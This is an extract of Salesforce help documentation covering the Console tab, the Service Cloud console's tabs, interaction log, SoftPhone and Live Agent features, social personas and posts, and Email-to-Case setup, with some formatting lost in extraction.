Search

Enter keywords in the search box above the list view and click Go! to use advanced search across all the searchable records
you can access in your organization. Terms in an advanced search are treated as separate words rather than a phrase and
can be found in different indexed fields within a record. So, searching for Pat Powers in advanced search will find a
contact named “Pat P Powers,” as well as a contact named “Pat Smith” with an email address of
“smith@powers.com.”.Search results display in the detail view.

Create records

From the New drop-down list, select any object to create a new record. New record pages display in the detail view.

View recent items

From the Recent Items drop-down list, you can choose to display any of the 10 records you most recently viewed. Recent
items display in the detail view.

Perform mass actions

Select the checkbox next to items in the list view, and from the Mass Action drop-down list, choose the action you want
to perform on all the selected records.

If you perform a mass action on more than 200 records while using Internet Explorer, you might be automatically logged
out of Salesforce.

Note: No data displays in the console if the selected list view does not contain any records.

See Also:
Console Tab Overview
Console Concepts
Displaying the Console Tab
Navigating within the Console Tab
Tip sheet: Using the Console
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SERVICE CLOUD CONSOLE

Service Cloud Console Overview
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Watch a Demo: Introducing the Service Cloud Console (2:00 minutes)

A Service Cloud console is an app that’s designed for users in fast-paced environments who need to find, update, and create
records quickly. It improves on the Console tab by letting you:

• Work with fewer clicks and less scrolling

• Limit switching between pages

• Use keyboard shortcuts to perform actions

• Easily spot important fields on records

• See records and their related items as tabs on one screen so that you never lose context or navigate too far from a record

• Jot notes on each record in an interaction log

• See visual indicators in real time when lists and records are changed by others

• Solve cases by quickly scanning Salesforce Knowledge articles

• Access a SoftPhone for Salesforce CRM Call Center in a footer instead of a sidebar

• Chat with customers in real time using Live Agent

See Also:
Service Cloud Console Terminology
Using a Service Cloud Console
Call Center Overview

Service Cloud Console Terminology
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

The following terms are used when describing Service Cloud console features and functionality.

Custom Console Component

A Visualforce page added to a Service Cloud console by an administrator to customize, integrate, or extend the capabilities
of the console.
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Highlights Panel

A customizable table of up to four columns and two rows that appears at the top of every primary tab in a Service Cloud
console. It lets you view key information about records at a glance.

Interaction Log

An area in a Service Cloud console where you can jot notes about the main record you're working on without clicking
a button, viewing a new tab, or scrolling to the Notes & Attachments related list. Interaction logs are archived on the
Activity History related list for easy review and retrieval. Administrators can customize interaction logs to include task
fields.

Knowledge Sidebar

A sidebar in a Service Cloud console that displays titles of Salesforce Knowledge articles that may solve the case you're
working on. It automatically searches and returns articles from your knowledge base that match any of the words you
type in the Subject of a case. The sidebar only displays for Salesforce Knowledge users after administrators set it up.

Navigation Tab

A tab with a drop-down button in a Service Cloud console that lets you select and view object home pages.

Primary Tab

A tab in a Service Cloud console that displays the main item to work on, such as an account.

Pinned Lists

Lists that display at the top or on the left side of a Service Cloud console; they're always visible and let you see the list
you're working from and a record's details at the same time. Pinned lists must be turned on by an administrator.

Push Notifications, Service Cloud Console

Visual indicators in a Service Cloud console that show when a record or field has changed during a user’s session.

Service Cloud Console Integration Toolkit

An API that uses browsers as clients to display pages as tabs in a Service Cloud console; it provides developers with
programmatic access to the console so that administrators can extend it to meet your business needs.

Subtab

A tab that displays content related to the item on a primary tab in a Service Cloud console. For example, a primary tab
showing an account might have subtabs for cases and contacts.

See Also:
Service Cloud Console Overview

Working with Tabs in a Service Cloud Console
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

All items you click on in a Service Cloud console display as tabs. Tabs let you see all the information you need on one screen
without losing context.
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Navigation Tab

• A Service Cloud console displays one navigation tab.
• Your Salesforce administrator determines the list of objects you can choose in a navigation tab.
• Most object home pages selected from a navigation tab display list views. Views automatically display as enhanced lists.
• A navigation tab doesn't display forecasts, ideas, answers, connections, portals, console, home, or buttons for customizing

your organization.

Primary Tab and Subtabs

•  displays on tabs where you haven't saved changes, except for tabs that display reports, Visualforce pages, or your
organization's setup pages. It also displays on tabs where you haven't saved changes to the interaction log. We recommend

that you save your changes often so that you don't lose any updates if your session ends. If you click  and select Save
all changes, only tabs with  save changes.

•  displays on tabs where you need to fix errors.
• Salesforce doesn't limit the number of tabs you can display.
• The tab's name lets you see at a glance its contents. If a name is truncated to fit a tab, you can hover over the tab to view

the item's full name. A tab that displays a page outside of Salesforce is named External Page.
• A tab can display a page outside of Salesforce if your administrator has added the page’s domain to a console’s whitelist.
• To return to any item, click on its tab (tabs don't close until you close them).
•

To clear your Service Cloud console of all tabs and start fresh, click  and select Close all primary tabs or Close all
subtabs.

•

To refresh tabs in your Service Cloud console and view recent updates, click  and select Refresh all primary tabs or

Refresh all subtabs. To refresh a specific tab, click  and select  next to the tab’s name. Note that if a tab has any
unsaved changes, it won’t refresh.

•

To copy the URL of a tab in your Service Cloud console and send it to another user, click  and select  next to
the tab’s name. In the Link to Share dialog box, choose whether the URL includes only the selected tab or all of the tab’s
primary tabs and subtabs. If you’re sending the URL to a non-console user, choose to create a standard Salesforce URL.
Then, press CTRL+C to copy the URL. When you’re finished, click Close to close the Link to Share dialog box.

•

To add a new tab to your Service Cloud console in which to paste a URL you’ve copied, click . In the text box, press
CTRL+V to paste the URL; then click Go!. You can paste a console URL or a standard Salesforce URL into a new tab.

• A new tab doesn't display when you click a custom button or change a record's type, owner, or territory. Instead, the current
tab goes to the item you selected.

• If you click Cancel on a newly created item that you haven't saved, the item and its tab are deleted and not sent to the
Recycle Bin.

• All Salesforce CRM Content items display as primary tabs in a Service Cloud console.
• If you click a custom link or a link in a text field, such as http://www.salesforce.com/ in a case Description, the link

displays in a popup window instead of a tab.

Tip:  If set up by your administrator, when you close your browser or log out of Salesforce, any of your previously
open navigator tabs, primary tabs, or subtabs automatically display when you log in again. Additionally, if you resize
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an interaction log or any sidebar components, such as pinned lists; or close the global search header, those customizations
automatically display when you log in again.

See Also:
Service Cloud Console Terminology
Using a Service Cloud Console

Case Feed in the Service Cloud Console
Available in: Enterprise, Unlimited, and Developer Editions

You can use Case Feed in the Service Cloud console, so if your organization currently works with cases in the console, it can
continue doing so. Note the following when using Case Feed with the console:

• If you use a SoftPhone in the console, completed calls are automatically logged in the case’s feed.

• Interaction log entries are added to the case’s feed when their Status is Completed.

• For best performance, we recommend using Internet Explorer 8 or 9 or the latest stable version of Firefox or Google
Chrome when using Case Feed in the Service Cloud console.

See Also:
Case Feed Overview

Using a Service Cloud Console
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Unlike standard Salesforce pages, all items you click in a Service Cloud console display as tabs. Tabs let you quickly:

• Find, update, and create records

• Review and update records from lists

• Display all the information you need on one screen without losing context

When you select a Service Cloud console from the Force.com app menu, the navigation tab appears. Use the navigation tab
to select an object and view its home page. Click any record in the home page to open the record as a primary tab. Primary
tabs display the main work item, such as an account. Related items on a primary tab are subtabs. In the example below, the
Acme account is the primary tab and the Carole White contact is its subtab.

1895

Case Feed in the Service Cloud ConsoleService Cloud Console



Figure 10: Service Cloud Console Tabs

1. Navigation tab
2. Primary tab
3. Subtab

With a Service Cloud console, you can:

• Work with tabs

• Search for records

• Resize pinned lists

• View push notifications

• View and edit record details

• Work with keyboard shortcuts

• Jot notes on records using the interaction log

• Find Salesforce Knowledge articles to solve cases

• Follow records using Chatter

• Use a Salesforce CRM Call Center SoftPhone

• Chat with customers using Live Agent

Note:  If your administrator adds custom console components, additional functionality might be available for you to
work with in the sidebars and footers of a Service Cloud console.

See Also:
Service Cloud Console Terminology
Service Cloud Console Overview

Searching for Records in a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

To search for records while using a Service Cloud console, type keywords in the Search box in the header and click Search.
Search in the Service Cloud console matches the capabilities of global search.
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To hide the global search header, click . To display it, click .

See Also:
Using a Service Cloud Console

Resizing and Minimizing Pinned Lists in a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

While only administrators can turn pinned lists on and off and change where they display on screen, all users can resize and
minimize pinned lists.

• To resize a pinned list, click on the right or bottom margin of the list (depending on whether it's displayed to the left or
at the top of the screen) and drag it to the size you want.

• To minimize a pinned list, click the arrow on the right or bottom margin. To display the list again, click the arrow once
more.

Note:  If you haven't yet selected a record from a list, the list automatically displays full screen.

See Also:
Using a Service Cloud Console

Viewing Push Notifications in a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Push notifications are visual indicators that show you when a record or field you’re viewing was changed by another user.
Indicators display on lists and detail pages after administrators set up push notifications for specific objects and fields.

• Detail pages automatically refresh with updates or display notifications as dialog boxes when changes occur.
• Lists display notifications as:

1. Yellow when a record changes
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2. Blue if it’s the last item you viewed
3. Bold and italic when a field specified by an administrator changes

• Notifications are cleared when you refresh your browser.

Note: The following objects and their fields are available for push notifications:

• Custom objects
• Cases
• Accounts
• Contacts
• Leads
• Campaigns
• Opportunities
• Tasks

See Also:
Using a Service Cloud Console

Viewing and Editing Details on a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Under every primary tab in a Service Cloud console, a highlights panel displays a subset of detail fields. When you change
those fields, the highlights panel updates automatically. You can't directly edit details in the highlights panel.

• If your organization enabled inline editing, you can edit fields directly on the detail page. Alternatively, to display the page
in edit mode, click Edit, make your changes, and click Save. To save the current record and create another one, click Save
& New.

• To quickly create a related item on the current record, click Create... and select the item.

• To hide the global search header, click . To display it, click .
• To hide or display the highlights panel, click .
• To specify different fields for the highlights panel, ask your Salesforce.com administrator.

• To display:

◊
A printable view of the record in a popup window, click .

◊
Customize the display of related lists in the detail view of the record, click .
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◊
An online help page for the record, click .

See Also:
Using a Service Cloud Console
Service Cloud Console Overview

Working with Keyboard Shortcuts in a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Keyboard shortcuts let you perform actions by pressing a combination of keys instead of having to use a mouse. Keyboard
shortcuts can make working with a Service Cloud console more efficient. For example, instead of typing case details and then
using a mouse to click Save, an administrator can create a keyboard shortcut so that you can type case details and press CTRL+S
to save cases without switching from your keyboard to your mouse.

Only administrators can customize keyboard shortcuts for a Service Cloud console. Contact your administrator to learn if
keyboard shortcuts are available to you.

Note:

• You can have up to 144 shortcuts for each console, which includes the default shortcuts provided by Salesforce
and any you create.

• Keyboard shortcuts aren’t case sensitive, even if you press SHIFT before a letter key. For example, SHIFT+b is
the same as SHIFT+B.

• If CTRL, ALT, or SHIFT is in a keyboard shortcut, the sequence of those keys doesn’t matter. For example,
CTRL+ALT+A is the same as ALT+CTRL+A.

• If you create or customize keyboard shortcuts to include standard browser shortcuts, such as CTRL+F, your
shortcuts might not work as intended.

See Also:
Using a Service Cloud Console
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Jotting Notes on Records in a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on tasksTo view the interaction log:

“Edit” on tasksTo save notes in the interaction log:

The interaction log lets you jot notes on records that display on primary tabs in a Service Cloud console. You can access the
log from the footer of a Service Cloud console if you're assigned to an interaction log layout.

• To add notes to a record, type your notes in the Enter your notes here... field, update any other fields as necessary,
and click Save Log. Optionally, click Save & New Log to save your notes and start a fresh interaction log. If you use a
SoftPhone, you can click End Call to end a call and save any updates you've made to the interaction log for screen pops
from inbound calls.

Last Saved shows when you saved notes during your current session.

• To show or hide the interaction log, hover over the log’s boarder and click  or . The log only displays in the
footer of a console.

• You can drag the bar in between the interaction log and a detail page to resize the height of either one.

• The interaction log only displays on items that have an Activity History related list, such as accounts and contacts (but not
solutions). The interaction log isn't available for items like reports, dashboards, Salesforce CRM Content, the Article
Management tab, or Visualforce pages that display as primary tabs.

• To help you add notes faster, when a contact appears on a subtab, the contact’s name populates the log’s Name. This is
because interaction logs are typically used to log notes on customers. You can change the Name before you save the log.

• Interaction logs are archived as tasks on the Activity History related list for easy review and retrieval.

• Administrators can customize interaction logs to include task fields.

See Also:
Using a Service Cloud Console
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Finding Articles to Solve Cases

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on the article's article typeTo view Salesforce Knowledge articles:

“Edit” on casesTo add Salesforce Knowledge articles to cases:

The Salesforce Knowledge sidebar automatically displays when you select a case in a Service Cloud console. Suggested articles
display in the sidebar as you enter details in the Subject of a case. Only articles updated within the last 30 days are displayed,
but you can view older articles by specifying a search term or filtering search results. The sidebar appears if it's set up by your
administrator and Salesforce Knowledge is enabled.

• To view an article, click its title.

• To filter articles by a specific category, language, or validation status, click  and choose filter options. Validation status
and multilingual articles must be enabled to access these filters. Your administrator determines which languages are available
for articles.

• To find articles to help you solve a case, click , type keywords into Search, and click Go.
• To attach an article to a case, click the checkbox next to the article and click Attach to Case. You can only attach an article

to a saved case.  displays next to an article already attached to a case.
• To remove an article attached to a case, click Detach next to the article on the Articles related list.

• To change the number of articles displayed, click the article count indicator in the lower left corner of the sidebar and
choose a setting. You can view 10, 25, 50, 100, or 200 articles at a time. When you change this setting, you return to the
first page of the list.

• Navigate through the list of articles by clicking the first page icon (<<), Previous, Next, or the last page icon (>>).

•

To show or hide the articles sidebar, hover over the scrollbar and click  or .
• New, Article Title, and Most Viewed are the only columns in the sidebar. You can drag the bar in between the

columns to resize them, but you can't add, remove, or rearrange columns.
• You can drag the bar in between the articles sidebar and a detail page to resize the width of either one.

See Also:
Searching for Articles
Displaying and Editing Cases
Using a Service Cloud Console
Service Cloud Console Overview

1901

Using a Service Cloud ConsoleUsing Unified Help Desks



Using a SoftPhone with a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

Member of a call centerTo view and use the SoftPhone:

Click  to display a SoftPhone from the footer of a Service Cloud console. You can access a SoftPhone if you're assigned
to a call center using a CTI adapter built with version 3.0 or 4.0 of the CTI Toolkit; or if you're using a call center built with
Open CTI.

The SoftPhone lets you:

• Make calls by dialing a number in the SoftPhone, choosing a number in an online directory, or clicking a phone number
in any record

• Receive calls

• Quickly view all records related to a call, such as contacts, cases, or accounts

• Transfer calls

• Initiate conference calls

• Put callers on hold

• Attach records to calls

Use the interaction log to write notes in call logs while using a Service Cloud console. A call log is an activity record that
automatically generates when you use a SoftPhone; it tracks the phone number, caller, date, time, and duration of the call.
You can view call logs in the Activity History related list of any record associated with the call.

Important:  Data might not save properly if you:

• Refresh your browser during a call.

• Use a SoftPhone in multiple browsers simultaneously. For example, if you use a SoftPhone in a browser with a
Service Cloud console and switch to a SoftPhone in a browser without a Service Cloud console, any changes you
made with a SoftPhone might not save.

Tips on Using a SoftPhone with the Service Cloud Console

• When you leave the Service Cloud console, the SoftPhone displays in the sidebar of every Salesforce page.
• You can't move the SoftPhone away from the footer of the Service Cloud console, but you can drag the bar on top of it to

resize its height or hide the SoftPhone by clicking .
• You can click End Call on the SoftPhone to end a call and save any updates you've made to the interaction log.
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•
If you're using a CTI adapter built with version 4.0 of the CTI Toolkit,  displays in the footer even when you're not
connected to the adapter.

See Also:
Using the SoftPhone
Checking the Version of Your CTI Adapter
Using a Service Cloud Console
Service Cloud Console Overview
Call Center Overview

Using Live Agent in the Service Cloud Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Live Agent in the Service Cloud console makes it easy to chat with multiple visitors at once and interact with Salesforce
records, all within a single browser window.

With Live Agent in the Service Cloud console, you can:

• Chat with visitors.

• Use the details tab to view information about the customer you’re chatting with and search for or create records in Salesforce.

• Use the articles tool to find Salesforce Knowledge articles to include in your chats.

• Use Quick Text messages in your chats.

• Transfer chats to other agents.

• Change your status to control when you receive chat requests and transfers.

Note:

• For best performance, we recommend using Internet Explorer 8, 9, or 10 or the latest stable version of Firefox or
Google Chrome when using Live Agent in the Service Cloud console.

• If you log in to another Salesforce app while you’re logged in to a Service Cloud console app, you can’t accept new
chat requests.

• Live Agent API limits apply when you use Live Agent in the Service Cloud console.

See Also:
Live Agent Home
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Accessing Live Agent in the Service Cloud Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

Live Agent is enabled, set up, and included in a Service Cloud
console app

To access Live Agent in the Service Cloud console:

1. Select a Service Cloud console from the Force.com app menu.
2. Change your Live Agent status to Online.
3. Select an incoming chat from the chat monitor to launch the Live Agent workspace.

See Also:
Using a Service Cloud Console

Using the Live Agent Articles Tool in the Service Cloud Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on the article typeTo search for and view an article:

The Live Agent articles tool in the Service Cloud console lets you find articles that help solve customer issues. The articles
tool is only available if your organization uses Salesforce Knowledge and your administrator has included the tool in your
Service Cloud console app.

1. When chatting with a visitor, click an article from the list in the articles tool. A tab with the full text of the article opens.

2. To search for a specific article in the list, type a word or phrase in the text box in the articles tool and click .

• Alternatively, click  at the top of the articles tool to search all articles, including those not in the list. The main
articles tool search gives you the option of limiting your results to specific types of articles.

• To filter your search results, click  and choose how you want to restrict your search.

3. When you find the article you want, click  next to it.
The text of the article appears in the chat text box.
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4. Click Send or press ENTER or RETURN on your keyboard to send the article to the visitor.

Note:  You can only send articles to visitors if your administrator has set up a Chat Answer field on articles. If
this field isn’t set up, you can view articles but can’t include them in chats.

See Also:
Using Live Agent in the Service Cloud Console
Chatting with Visitors in Live Agent in the Service Cloud Console

Chatting with Visitors in Live Agent in the Service Cloud Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

Live Agent is enabled, set up, and included in a Service Cloud
console app

To chat with visitors in Live Agent in the Service Cloud
console:

The chat monitor shows a list of incoming requests. For each request, you can see the deployment (or website) it came in
from, the name of the customer (if available), and the age (in minutes) of the request.

You can chat with several different visitors at the same time. Each chat session opens as a separate primary tab.

1. Click Accept on a chat request.
The chat area becomes active and the request is removed from the list.

2. Type your message in the chat text field and click Send or hit ENTER or RETURN on your keyboard.
Your message appears in the chat log area above the text field. The log displays all messages sent by you and the visitor.

3. Optionally:

• Use the details tab to see and search for information about the visitor.
• Use the articles tool to search for Salesforce Knowledge articles to include in the chat.
• Use Quick Text to include short pre-written messages in your chat.
• Transfer the chat to another agent.

4. Click End Chat to end the chat session. If the visitor ends the chat, a notice appears at the top of the chat log area.

Note: If you log in to another Salesforce app while you’re logged in to a Service Cloud console app, you can’t accept
new chat requests.

See Also:
Using a Service Cloud Console
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Using the Details Tab in Live Agent in theService Cloud Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on the object

AND

“Create” on Live Chat Transcripts

To search for and view a record:

“Create” on the object

AND

“Create” on Live Chat Transcripts

To create a new record:

“Edit” on the object

AND

“Create” on Live Chat Transcripts

To edit a record:

“Delete” on the object

AND

“Create” on Live Chat Transcripts

To delete a record:

When you accept a chat request in Live Agent in the Service Cloud console, a details tab for that chat opens automatically.
The details tab includes information about the visitor and lets you look up records related to the chat, such as contacts and
cases.

•
To search for a record, type a name in the relevant box in the Related Entities section of the page, then click . To
associate a record you find to the chat, select it from the search results list and click Save.

• Once you associate an existing record to the chat, click the name of the record to open it in a new tab.

• To create a new record, click New Case, New Lead, New Contact, or New Account.

Note:  Depending on how your administrator has set up Live Agent, new records such as cases and contacts might
open automatically as tabs when you accept a chat request. You can use these tabs to create new records instead
of using the details tab.

See Also:
Using Live Agent in the Service Cloud Console
Chatting with Visitors in Live Agent in the Service Cloud Console
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Using Quick Text in Live Agent in the Service Cloud Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on Quick TextTo access Quick Text messages while chatting with visitors
in Live Agent:

Quick Text helps you respond to customers more efficiently by letting you insert pre-written messages, such as greetings and
common troubleshooting steps, into customer communications like email and chats. You can access Quick Text messages
quickly and easily as you chat with visitors in Live Agent in the Service Cloud console.

Your administrator must give you access to Quick Text before you can use it.

1. While chatting with a visitor, type ;; in the chat text box.
A list of Quick Text messages appears, with the messages you’ve used most recently at the top.

2. To see additional messages, type a word or phrase.
A list of messages that include those words appears.

3. To see the title and full text of a message, click it once or highlight it using the arrow keys on your keyboard.
The full message appears at the bottom of the Quick Text list.

4. To select a message and add it to your chat, double-click it or highlight it and press ENTER or RETURN on your
keyboard.
If the message you select contains merge fields, they’re resolved when you add the message to your chat.

See Also:
Using Live Agent in the Service Cloud Console
Chatting with Visitors in Live Agent in the Service Cloud Console
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Using Quick Text in the Live Agent Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on Quick TextTo access Quick Text messages while chatting with visitors
in Live Agent:

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

Quick Text helps you respond to customers more efficiently by letting you insert pre-written messages, such as greetings and
common troubleshooting steps, into customer communications like email and chats. The Quick Text sidebar in the Live Agent
console shows you the categories and messages you can choose.

Your administrator must give you access to Quick Text before you can use it.

To use Quick Text in the console:

1. While chatting with a customer, click  next to Select a category... in the sidebar.
2. Select a category.
3. To see a preview of a message, hover your mouse pointer over a message name.
4. Click the name of a message to add it to your chat.

Alternatively, you can select and add Quick Text messages directly from the chat text field. When you start typing, a list
of messages that include the words you type appears below the text box. Select a message from the list to add it to your
chat.

See Also:
Using the Live Agent Console
Quick Text Home
Using the Live Agent Console
Live Agent Home
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Console FAQ

Available in: Professional, Enterprise, Unlimited, and Developer Editions

• How is the Console tab different from other tabs in Salesforce?

• How do I view the console?

• Why do I only see the list views of certain objects in the console?

• Can I view more than one Console tab?

• Is the console the same thing as the Service Cloud console?

How is the Console tab different from other tabs in Salesforce?
The Console tab is just like other tabs in Salesforce except that the console can display records from several different Salesforce
tabs all on one Console tab. This allows you to have all the information you need on one tab when interacting with Salesforce.
By using the Console tab, you can quickly find, view, and edit records, such as cases, accounts, and contacts, with fewer clicks
and without switching back and forth between screens.

See Also:
Console FAQ

How do I view the console?
You can view the console by clicking the Console tab. You can only access the Console tab if your administrator has assigned
your user profile to a console layout and granted you access to the Console tab. You can customize your display to make the
Console tab visible in your tab sets.

See Also:
Console FAQ

Why do I only see the list views of certain objects in the console?
The list views of objects you can display in the console are defined by your administrator in the console layout assigned to your
user profile.

See Also:
Console FAQ
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Can I view more than one Console tab?
No. You can only view one Console tab. However, your administrator can customize many different console layouts to display
a variety of objects in the console's list view, and then assign those console layouts to different user profiles to satisfy business
needs for different users.

See Also:
Console FAQ

Is the console the same thing as the Service Cloud console?
No. The Service Cloud console improves on the Console tab by letting you:

• Work with fewer clicks and less scrolling
• Limit switching between pages
• Use keyboard shortcuts to perform actions
• Easily spot important fields on records
• See records and their related items as tabs on one screen so that you never lose context or navigate too far from a record
• Jot notes on each record in an interaction log
• See visual indicators in real time when lists and records are changed by others
• Solve cases by quickly scanning Salesforce Knowledge articles
• Access a SoftPhone for Salesforce CRM Call Center in a footer instead of a sidebar
• Chat with customers in real time using Live Agent

See Also:
Console FAQ

TRACKING SOCIAL CUSTOMERS AND INQUIRIES

Managing Social Personas
A social persona is a Salesforce object that represents a contact's profile on a social network such as Facebook, LinkedIn, or
Twitter.

Social personas and posts are available in: Enterprise, Unlimited, and Professional Editions.

User Permissions Needed

“Customize Application”To install and deploy Radian6 for Salesforce.com
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Note:  Using Social Personas and Social Posts objects for social customer service is currently available through a pilot
program. For information, contact salesforce.com.

The Social Personas tab or object is a collection of publicly available information about a person or company from Twitter. A
Persona is relative to the social network and there can be multiple personas attached to a single contact. You can edit or delete
a persona but you can’t manually create a social persona from Salesforce. The personas are created from public information
on social networking sites. To view and manage your social personas:

1. Click the Social Personas tab.
2. Optionally, select a view.

The list defaults to those recently viewed. Select All to show all social personas in your organization. You can also create
a new view to fit your needs.

3. Click on the social handle you’d like to manage.

If you selected a view you can click Edit or Del (delete) as appropriate.

On the social persona detail page you can:

• View and edit the contact’s available information for that social network.

Note:  The information varies depending on the social network the persona is from.

• Delete the social persona from your organization.
• Create, edit, and delete social posts.

Managing Social Posts
A social post is a Salesforce object that represents a post on a social network such as Facebook, LinkedIn, or Twitter.

Social personas and posts are available in: Enterprise, Unlimited, and Professional Editions.

User Permissions Needed

“Customize Application”To install and deploy Radian6 for Salesforce.com

Note:  Using Social Personas and Social Posts objects for social customer service is currently available through a pilot
program. For information, contact salesforce.com.

The Social Posts tab or object is a collection of information about a post from a person or company on a social network, such
as Twitter. The available information for a post varies depending on the social network. To view and manage social posts:

1. Click the Social Posts tab.
2. Optionally, select a view.

The list defaults to those recently viewed. Select All to show all social posts in your organization. You can also create a
new view to fit your needs.

3. Click on the social post name you’d like to manage or click New Social Post to create a post.
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If you selected a view you can click Edit or Del (delete) as appropriate.

Note:  On the Social Post tab, you can only create, edit, and delete posts in your Salesforce organization, not on
the social networks.

On the social post detail page you can:

• View, edit, and create the post’s content and information.

Note:  The information varies depending on the social network the persona is from.

Don’t forget to click Save to save changes or create a new post.
• Delete the post from your organization.
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Welcome, Support Administrators
This documentation is for administrators who want to set up Salesforce customer service and support features, also known as
the Service Cloud. It’s organized by tasks so that you can quickly find information about setting up features that solve support
issues for your company. For example, information about setting up self-service websites is located in a section named Creating
Web and Social Channels, rather than a section that includes the feature names, Customer Portal or Chatter Answers. However,
you can search this documentation by keywords to find a feature name or support solution. Note that this documentation
doesn’t include many feature-specific concepts or overviews. For those, please refer to the documentation, Support Your
Customers.

Together, Set Up and Maintain Customer Support Tools and Support Your Customers contain the information you need to set up
and deliver customer service with Salesforce.

SET UP AND MAINTAIN CUSTOMER
SUPPORT TOOLS
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SETTING UP CUSTOMER CHANNELS

CREATING EMAIL CHANNELS

Email-to-Case and On-Demand Email-to-Case Overview
Email-to-Case and On-Demand Email-to-Case are available in: Professional, Enterprise, Unlimited, and Developer
Editions.

User Permissions Needed

“Customize Application”To set up Email-to-Case or On-Demand Email-to-Case:

“Modify All Data”

AND

“Customize Application”

To enable Email-to-Case or On-Demand Email-to-Case:

Salesforce can automatically create a case when an email is sent to one of your company's support email addresses, such as
support@company.com. Your organization can set up Email-to-Case or On-Demand Email-to-Case to efficiently resolve
and correspond with customer inquiries via email.

Salesforce allows you to choose which option is best for your organization.

Email-to-Case

Email-to-Case helps your company efficiently resolve and correspond with customer inquiries via email. It automatically
creates a case in Salesforce when an email is sent to your company’s customer support email address(es) and auto-populates
case fields from the content of the message.

Email-to-Case requires downloading the Email-to-Case agent. This allows you to keep all email traffic within your
network’s firewall and accept emails larger than 10 MB. You must install this agent on your local machine before Salesforce
can process your company’s support emails.

On-Demand Email-to-Case

On-Demand Email-to-Case helps your company efficiently resolve and correspond with customer inquiries via email.
It automatically creates a case in Salesforce when an email is sent to your company’s customer support email address(es)
and auto-populates case fields from the content of the message. On-Demand Email-to-Case allows you to process
customer emails up to 10 MB in size.

Unlike Email-to-Case, On-Demand Email-to-Case uses Apex email services to convert email to cases, without requiring
you to download and install an agent behind your network's firewall. Use On-Demand Email-to-Case if you’re not
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concerned about keeping email traffic within your firewall, and you don’t need to accept attachments larger than 10 MB
from customers.

See Also:
Enabling and Configuring Email-to-Case
On-Demand Email-to-Case Settings

Setting Up Email-to-Case
Email-to-Case is available in: Professional, Enterprise, Unlimited, and Developer editions.

User Permissions Needed

“Customize Application”To set up Email-to-Case:

“Modify All Data”

AND
“Customize Application”

To enable Email-to-Case:

Email-to-Case helps your company efficiently resolve and correspond with customer inquiries via email. It automatically
creates a case in Salesforce when an email is sent to your company’s customer support email address(es) and auto-populates
case fields from the content of the message.

1. Download the Email-to-Case agent.. This allows you to keep all email traffic within your network’s firewall and accept
emails larger than 10 MB from customers.

2. Install the agent behind your network’s firewall.
3. Enable Email-to-Case and configure your Email-to-Case settings.
4. Configure your routing address settings to customize the way Salesforce handles your customer emails.
5. Test your email routing addresses by manually sending emails to them and verify that these emails convert to cases based

on their routing address settings.
6. Add the email address that you configured to your company's support website. This is the email address customers can use

to submit cases to your support team.
7. Add the Emails related list to the Cases page layout.

Note:  You can create email templates that support reps can use to respond to Email-to-Case or On-Demand
Email-to-Case emails. These templates can include merge fields that display information from the original email in
the response.

See Also:
Email-to-Case and On-Demand Email-to-Case Overview
Enabling and Configuring Email-to-Case
Email-to-Case Settings
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Enabling and Configuring Email-to-Case

Email-to-Case is available in: Professional, Enterprise, Unlimited, and Developer editions.

User Permissions Needed

“Customize Application”To set up Email-to-Case:

“Modify All Data”

AND
“Customize Application”

To enable Email-to-Case:

Before you can enable and configure Email-to-Case, you need to download and install the Email-to-Case agent onto your
local machine.

1. From Setup, click Customize > Cases > Email-to-Case.
2. Click Edit.
3. Select Enable Email-to-Case.
4. Configure your Email-to-Case settings.
5. Click Save.

See Also:
Email-to-Case and On-Demand Email-to-Case Overview
Email-to-Case Settings
Configuring Routing Addresses for Email-to-Case and On-Demand Email-to-Case

Email-to-Case Settings

Email-to-Case is available in: Professional, Enterprise, Unlimited, and Developer editions.

You can configure your Email-to-Case settings to customize the way your incoming emails are processed.

DescriptionEmail-to-Case Setting

Select this checkbox to allow case owners to automatically
receive notifications of new emails for their existing cases.

Notify Case Owners on New Email

Email notifications assign a task to the case owner to respond
to the new email. Responding to the email closes the task. To
disable email notifications at any time, simply deselect the
checkbox.
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DescriptionEmail-to-Case Setting

Select this checkbox to warn users before they view incoming
HTML email content so that they can avoid opening

Enable HTML Email

potentially malicious HTML that could harm their computers.
With this setting disabled, users will see text instead of HTML
on email message detail pages, and when users reply to an
email, the text version of the email will be copied to the email
editor, instead of the HTML version. To disable HTML
email warnings at any time, simply deselect the checkbox.

Select this checkbox to add the thread ID to the subject of
email.

Email Subject

Select this checkbox to add the thread ID to the body of email.Email Body

Notes on Email Subject and Email Body

• Make sure the subject line and body of your outgoing emails are unique.

